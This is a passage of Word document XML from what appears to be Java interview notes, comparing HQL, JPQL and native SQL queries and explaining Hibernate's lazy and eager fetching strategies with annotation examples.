          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758DE69D"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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD50221"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Object-oriented query language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09BF97D0"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Object-oriented query language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162FC8A7"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QL (Structured Query Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6BEB1B3B" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBFA967"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Abstraction Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD2C555"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High-level, ORM abstraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E943E4"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High-level, ORM abstraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16DE5EE4"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ow-level, works directly with DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="22583297" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35808E6F"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Portability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FE516A9"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Hibernate-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A31F2C"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Portable across JPA providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36EFA34B"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Not portable, database-dependent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="60CE7CB5" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C998321"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Entity Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18484C47"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Uses Hibernate entities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28A2F79E"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Uses JPA entities (similar to HQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F02283E"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Works with database tables/columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="17B40480" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C930FB5"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Complex SQL Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CE786E"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imited, ORM-friendly queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEF0088"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Limited, ORM-friendly queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AF442D0"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Full SQL capabilities, database-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="67013AE3" w14:textId="77777777" w:rsidTr="00A70A74">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701D5B4B"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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31444050"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FROM Employee e WHERE e.dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2263FE7A"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LECT e FROM Employee e WHERE e.dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712657BF" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F3379">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SELECT * FROM employee WHERE dept = :dept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="353D0416" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When to Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D28FDF" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2029"/>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HQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When using Hibernate as your ORM framework and you prefer to work with objects rather than tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E60341" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2029"/>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JPQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When using JPA and want to maintain portability between different JPA implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1792A8" w14:textId="77777777" w:rsidR="00A70A74" w:rsidRPr="007F3379" w:rsidRDefault="00A70A74" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2029"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Native Query</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need to execute database-specific SQL queries or when you require performance optimizations or advanced SQL features not supported by HQL or JPQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468033F8" w14:textId="754DCDCE" w:rsidR="00E71FF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E71FF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F56858A">
          <v:rect id="_x0000_i2467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C3F19" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="00CE4B95" w:rsidRDefault="006A176B" w:rsidP="006A176B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="_Toc196308042"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What kind of fetching strategy are you using in hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
    </w:p>
    <w:p w14:paraId="09CF6BBF" w14:textId="64CB9355" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Hibernate, fetching strategies define how related entities are retrieved from the database. There are two primary fetching strategies: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eager Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lazy Fetching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Below are the details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75652785" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Lazy Fetching (Default Behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA0ECE"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In lazy fetching, related entities are not loaded immediately with the parent entity. Instead, they are loaded only when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06C77B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This strategy is useful when you don't need to load all the related entities immediately, thus improving performance by avoiding unnecessary database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FA0EF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you have an entity Order that has a relationship with OrderDetails, you can specify lazy fetching so that OrderDetails are only loaded when explicitly accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DD633"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Lazy Fetching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF5983"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ManyToOne(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9E184"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinColumn(name = "customer_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD4026"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private Customer customer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82B851"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In this example, customer will not be loaded until it is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5ABFC" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Eager Fetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06038AA3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In eager fetching, related entities are loaded immediately with the parent entity, i.e., they are fetched as soon as the parent entity is retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA4982"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This strategy is used when you know that you will need the related entities immediately, and loading them upfront can reduce the number of database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712F1B3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For an Order entity with a relationship to OrderDetails, eager fetching would load the OrderDetails along with the Order entity in the same query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCF4914"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Eager Fetching in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77335110"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToMany(fetch = FetchType.EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9D9FD"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinColumn(name = "order_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC661A"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private Set&lt;OrderDetail&gt; orderDetails;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215A6D8"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here, orderDetails will be fetched immediately along with the Order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE9D88" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Fetching Strategies for Specific Relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE6E49"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One-to-One</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This relationship is often eagerly fetched, especially if both entities are closely related and you need both at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C398E02"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToOne(fetch = FetchType.EAGER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709B200"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinColumn(name = "profile_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE8A96"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private Profile profile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25175524"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One-to-Many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By default, it is usually lazy-loaded, but if you need all the records at once, you can use eager fetching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2A05D8"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@OneToMany(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662EF90C"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private Set&lt;Order&gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33152970"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Many-to-Many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Like one-to-many, it’s typically lazy-loaded, but can be configured as eager if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE36CA0"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ManyToMany(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB2625"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@JoinTable(name = "student_course", joinColumns = @JoinColumn(name = "student_id"), inverseJoinColumns = @JoinColumn(name = "course_id"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14832220"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private Set&lt;Course&gt; courses;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E073" w14:textId="77777777" w:rsidR="006A176B" w:rsidRPr="007F3379" w:rsidRDefault="006A176B" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Join Fetching (JPQL or HQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F3F71"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HQL (Hibernate Query Language)</w:t>
      </w:r>
